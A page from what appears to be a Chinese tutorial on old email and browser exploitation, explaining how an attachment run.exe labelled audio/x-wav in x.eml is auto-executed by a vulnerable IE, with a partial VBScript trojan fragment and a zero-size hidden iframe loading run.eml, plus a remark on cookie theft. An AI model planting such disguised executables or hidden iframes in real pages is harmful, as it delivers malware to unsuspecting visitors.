把run.exe的类型定义为audio/x-wav，这下清楚了，这是利用客户端支持的 MIME(多部分网际邮件扩展，Multipart Internet Mail Extension) 类型的漏洞来完成的。当申明邮件的类型为audio/x-wav时，IE存在的一个漏洞会将附件认为是音频文件自动尝试打开，，结果导致邮件文件x.eml中的附件run.exe被执行。在win2000上，即使是用鼠标点击下载下来的 x.eml，或是拷贝粘贴，都会导致x.eml中的附件被运行。整个程序的运行还是依靠x.eml这个文件来支持。Content-Transfer-Encoding: base64 Content-ID: 从这我们可以看出，由于定义后字符格式为base64，那么一下的代码全部为加密过的代码，里面可以是任何执行的命令:

　　〈script language=vbs〉

　　On Error Resume Next·　容错语句，避免程序崩溃

　　set aa=CreateObject("Wscript.Shell")·建立Wscript对象

　　Set fs = CreateObject("scripting.FileSystemObject")·建立文件系统对象

　　Set dir1 = fs.GetSpecialFolder(0)·得到Windows路径

　　Set dir2 = fs.GetSpecialFolder(1)·得到System路径

　　……省略……

　　下面代码该做什么各位都该清楚吧.这就是为什么很多人中毒后不能准确的清除全部的病毒体的原因，也是很多杀毒软件的一个通病。病毒监控只杀当时查到的，新建的却置之不理。

　　Ⅲ. iframe 漏洞的利用

　　㈠

　　多方便的办法，浏览者的COOKIES就这样轻松的被取走。

　　㈡

　　〈iframe src=run.eml width=0 height=0〉〈/iframe〉

　　常见的木马运用格式，高度和宽度为0的一个框架网页，我想你根本看不到它。除非你的浏览器不支持框架!

上一页  [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]  ... 下一页  >>